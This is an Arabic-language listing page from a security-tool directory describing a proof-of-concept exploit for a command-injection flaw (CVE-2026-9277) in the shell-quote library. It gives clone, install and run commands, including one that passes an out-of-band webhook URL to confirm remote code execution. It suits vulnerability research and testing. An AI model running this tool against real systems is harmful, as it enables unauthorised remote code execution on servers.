Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-9277 — استغلال إثبات المفهوم لـ CVE-2026-9277، ثغرة حقن أوامر في مكتبة shell-quote. يقوم باجتياز JSON تكراري مع طفرة اندماجية لتفعيل RCE، مع دعم التحقق خارج النطاق وتسجيل بدون ضوضاء. | Kitploit
أدوات/GitHubGitHub/dylanzahedi/cve-2026-9277
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubdylanzahedi/cve-2026-9277

CVE-2026-9277

استغلال إثبات المفهوم لـ CVE-2026-9277، ثغرة حقن أوامر في مكتبة shell-quote. يقوم باجتياز JSON تكراري مع طفرة اندماجية لتفعيل RCE، مع دعم التحقق خارج النطاق وتسجيل بدون ضوضاء.

عرض المستودع
21منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-9277 - استغلال حقن الأوامر في Shell-Quote

سكربت استغلال متخصص من نوع إثبات المفهوم (PoC) مصمم للتحقق من CVE-2026-9277 وإثباته — وهي ثغرة حقن أوامر بنيوية (Command Injection) موجودة في الإصدارات القديمة من مكتبة shell-quote (<= 1.8.3).

يقوم الماسح بتلاعب بنيوي عميق في حمولات JSON المُدخلة لكشف نواقل تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر الاجتياز التكراري، مع منع النتائج الإيجابية الكاذبة باستخدام محرك توقيت ديناميكي لخط الأساس الشبكي.


الميزات الرئيسية

  • الاجتياز التكراري لـ JSON: يكتشف تلقائيًا المصفوفات المستهدفة المخفية داخل هياكل JSON المتداخلة متعددة الطبقات أو الإعدادات الشبيهة بـ GraphQL، ويقوم بتحويرها.
  • مصفوفة التحوير التوافقي: تختبر سيناريوهات متقدمة لمعالجة المصفوفات، بما في ذلك الإدراج في فهارس محددة، والاستبدال المطلق للقوائم، وأزواج المصفوفات المبعثرة.
  • بنية OOB الآلية: تتعامل مع تخطيطات تنفيذ خارج النطاق (Out-of-Band) المتقدمة عبر فصل مكونات {"op": "..."} عن الوسائط لتجاوز ضوابط عزل السلاسل النصية بنجاح.
  • تسجيل بلا ضوضاء: محرك تنفيذ صامت يفلتر استجابات خطأ الخادم الداخلي 500 المعطوبة/غير القابلة للاستغلال، ليُظهر حصريًا الأدلة المتحقق منها.

التثبيت والإعداد

تأكد من تثبيت Python 3.10+ والحزم المطلوبة:

root@kitploit:~
git clone https://github.com/DylanZahedi/CVE-2026-9277.git
cd CVE-2026-9277
pip install requests urllib3

أمثلة التشغيل

المثال 1: فحص محلي مع تسريب المخرجات

root@kitploit:~
python CVE-2026-9277.py -u "https://example.com/command" -b '{"message_tokens": ["Hello", "from", "normal user"]}'

المثال 2: اختبار خارج النطاق (OOB) مع بنية قاموس متداخلة

root@kitploit:~
python CVE-2026-9277.py -u "https://example.com/command" -b '{"user": {"commands": ["a", "b"]}}' -w "https://webhook.site/your-uuid-here"


CVE-2026-9277
تنزيل الأداة